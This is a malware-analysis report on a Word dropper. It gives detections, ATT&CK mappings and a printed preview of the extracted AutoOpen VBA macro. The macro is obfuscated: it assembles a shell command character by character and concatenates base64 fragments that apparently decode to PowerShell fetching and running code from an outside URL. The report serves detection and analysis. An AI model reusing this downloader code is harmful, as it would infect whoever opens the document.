MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6444900-0' further supports its role as a dropper. The macro's obfuscated string concatenation suggests a deliberate effort to hide the payload's origin or nature.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6444900-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6444900-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7100 bytes |
SHA-256: 353c4eb8338a9d5e2abb823cf6cd8c297c59b5e8838fb5a34cd5d51963a92c34 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Tracking"
Sub AutoOpen()
Dim IO_LB As String
JL_NB = Array("-", "e", "i", "c", "y", "b", "a", "s", " ", "w", "p", "d", "l", "h", "r", "x", "o", "n", "u", "t")
Dim GS_TF As String
GS_TF = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
Dim ER_TE As String
ER_TE = "QAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAe"
IO_LB = IO_LB + JL_NB(10)
IO_LB = IO_LB + JL_NB(16)
Dim FT_LA As String
FT_LA = "QBzAHQAZQB"
Dim DM_MI As String
DM_MI = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABp"
IO_LB = IO_LB + JL_NB(9)
IO_LB = IO_LB + JL_NB(1)
Dim GO_SE As String
GO_SE = "AG4AZwBdADoAOgBVAFQARgA4AC4ARwBl"
GN_QI = GN_QI & GS_TF & ER_TE & FT_LA & DM_MI & GO_SE
Dim IT_NB As String
IT_NB = "AHQAUwB0AHIAaQBuAGcAKABbAFMAeQ"
IO_LB = IO_LB + JL_NB(14)
IO_LB = IO_LB + JL_NB(7)
Dim BO_MG As String
BO_MG = "BzAHQAZQBtAC4AQwBvAG4AdgBlAHIAd"
Dim IQ_LC As String
IQ_LC = "ABdADoA"
IO_LB = IO_LB + JL_NB(13)
IO_LB = IO_LB + JL_NB(1)
Dim IL_TH As String
IL_TH = "OgBGAHIAbwBtAEIAYQBzAGUANgA0AFM"
Dim BO_PC As String
BO_PC = "AdAByAGkAbgB"
GN_QI = GN_QI & IT_NB & BO_MG & IQ_LC & IL_TH & BO_PC
IO_LB = IO_LB + JL_NB(12)
IO_LB = IO_LB + JL_NB(12)
Dim GM_PJ As String
GM_PJ = "nACgAJAB4ACkAKQB9A"
Dim HQ_PI As String
HQ_PI = "DsAaQBlAHgAIAAkACgAYQ"
IO_LB = IO_LB + JL_NB(8)
IO_LB = IO_LB + JL_NB(0)
Dim DT_SE As String
DT_SE = "AgACQAK"
Dim DP_LG As String
DP_LG = "AAkACgAJAAoAGkAb"
IO_LB = IO_LB + JL_NB(9)
IO_LB = IO_LB + JL_NB(2)
Dim CM_LG As String
CM_LG = "gB2AG8A"
GN_QI = GN_QI & GM_PJ & HQ_PI & DT_SE & DP_LG & CM_LG
Dim BN_NJ As String
BN_NJ = "awBlAC0AdwBlAGIA"
IO_LB = IO_LB + JL_NB(17)
IO_LB = IO_LB + JL_NB(11)
Dim CN_OF As String
CN_OF = "cgBlAHEAdQBlA"
Dim GP_SC As String
GP_SC = "HMAdAAgACcAaAB0AHQAcABzADoALw"
IO_LB = IO_LB + JL_NB(16)
IO_LB = IO_LB + JL_NB(9)
Dim HM_SJ As String
HM_SJ = "AvAHUAcwB"
Dim FL_LG As String
FL_LG = "wAHIAZAA1A"
GN_QI = GN_QI & BN_NJ & CN_OF & GP_SC & HM_SJ & FL_LG
IO_LB = IO_LB + JL_NB(7)
IO_LB = IO_LB + JL_NB(19)
Dim BR_QC As String
BR_QC = "DEANQAwAGMAZQB"
Dim FM_TE As String
FM_TE = "uAHQAcgBhAGwALgB0AGEAYgB"
IO_LB = IO_LB + JL_NB(4)
IO_LB = IO_LB + JL_NB(12)
Dim FT_NH As String
FT_NH = "sAGUALg"
Dim DS_SJ As String
DS_SJ = "BjAG8AcgBlAC4AdwBpAG4AZABvAHcAcw"
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(8)
Dim BS_SH As String
BS_SH = "AuAG4AZQB0A"
GN_QI = GN_QI & BR_QC & FM_TE & FT_NH & DS_SJ & BS_SH
Dim CQ_LI As String
CQ_LI = "C8AdwBhAHIAZQBoAG8Ad"
IO_LB = IO_LB + JL_NB(13)
IO_LB = IO_LB + JL_NB(2)
Dim DL_PC As String
DL_PC = "QBzAGUAPwAkAGYAaQBsAHQ"
Dim HT_TF As String
HT_TF = "AZQByAD0AUABhAHIAdABpAHQAaQBvAG4"
IO_LB = IO_LB + JL_NB(11)
IO_LB = IO_LB + JL_NB(11)
Dim DL_SD As String
DL_SD = "ASwBlAHkAJQAyADAA"
Dim JO_NC As String
JO_NC = "ZQBxACUAMgAwACUAMgA3AHMAd"
GN_QI = GN_QI & CQ_LI & DL_PC & HT_TF & DL_SD & JO_NC
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(17)
Dim FL_RH As String
FL_RH = "ABhAGcA"
Dim BP_PF As String
BP_PF = "ZQAlADIANwAmACQAUwBlAGwA"
IO_LB = IO_LB + JL_NB(8)
IO_LB = IO_LB + JL_NB(0)
Dim DK_TD As String
DK_TD = "ZQBjAHQAPQBkAGEAdA"
Dim FT_OC As String
FT_OC = "BhACYAcwB2AD0AMgAwADEANwAtADAAN"
IO_LB = IO_LB + JL_NB(1)
IO_LB = IO_LB + JL_NB(15)
Dim IT_SD As String
IT_SD = "AAtADEANwAmAHMAcwA9A"
GN_QI = GN_QI & FL_RH & BP_PF & DK_TD & FT_OC & IT_SD
Dim AM_OH As String
AM_O
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.